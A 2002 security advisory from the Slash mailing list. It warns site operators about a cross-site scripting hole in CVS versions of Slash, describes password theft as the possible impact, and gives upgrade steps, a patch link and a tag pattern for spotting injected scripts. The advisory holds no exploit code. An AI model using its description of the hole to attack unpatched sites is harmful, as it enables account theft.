Menu
▾
▴
[Slashcode-announce] XSS vuln in *CVS* Slash code, please read
|
From: Jamie M. <ja...@mc...> - 2002-07-02 15:46:59
|
Slash in CVS had a cross-site scripting (XSS or CSS) vulnerability from June 20 to July 1 (yesterday). If you are running Slashcode from one of the tarball releases -- hopefully you are on 2.2.5 -- you are unaffected, don't worry about it. But if you are running Slashcode from CVS and you updated your site between June 20 and July 1, you will need to update to the latest version in CVS now. Please do so now. An example exploit of this vulnerability has been posted to bugtraq (and Slashdot!) so you should assume that malicious users are already actively trying to attack sites. The example exploit did not include specific instructions on how to steal passwords, but this is trivial for anyone who understands XSS. The impact of this vulnerability is that malicious readers can, at worst, steal your users' passwords, including those of your admins. Even if they do not steal passwords, they can cause other kinds of havoc by inserting unwelcome HTML, including scripting attacks, into comments and such. After upgrading to the latest CVS, you should check the text fields of recent comments, journal entries, and submissions to make sure there are no scripting attacks. (Look for text like "<p " which indicates a tag that has attributes where none should be allowed. Other tags may be exploited.) If you cannot rule out the possibility of such attacks having been posted to your site, you will want to change your admins' passwords and otherwise take steps to ensure that their accounts are not compromised. Sorry about all this, but these things can happen when you're working with pre-development-release CVS. Life in the fast lane. We'll try to make sure they don't happen again. Several of the Slash coders hang out in the #slash IRC channels on openprojects.net and if you need help updating a CVS site to the latest version, we can help. If you cannot upgrade to the latest version of CVS at this time, the simpler fix is to apply the "else" clause from this one patch. Note that, if your code from CVS is not already a the vulnerable version (Data.pm v1.31 to v1.38), it will look very different from what's shown here, and you will not know where to apply the patch, which is fine because that means you're not vulnerable :) http://cvs.slashcode.com/index.cgi/slash/Slash/Utility/Data/Data.pm.diff?r1=1.38&r2=1.39 P.S. My bugtraq post said CVS between June 17 and July 1 was vulnerable; that's not correct, it's between June 20 and July 1. To be precise, Slash/Utility/Data/Data.pm versions 1.31 to 1.38. (At this moment, I'm still waiting for the bugtraq moderator to send that post through to that list.) -- Jamie McCarthy ja...@sl... |
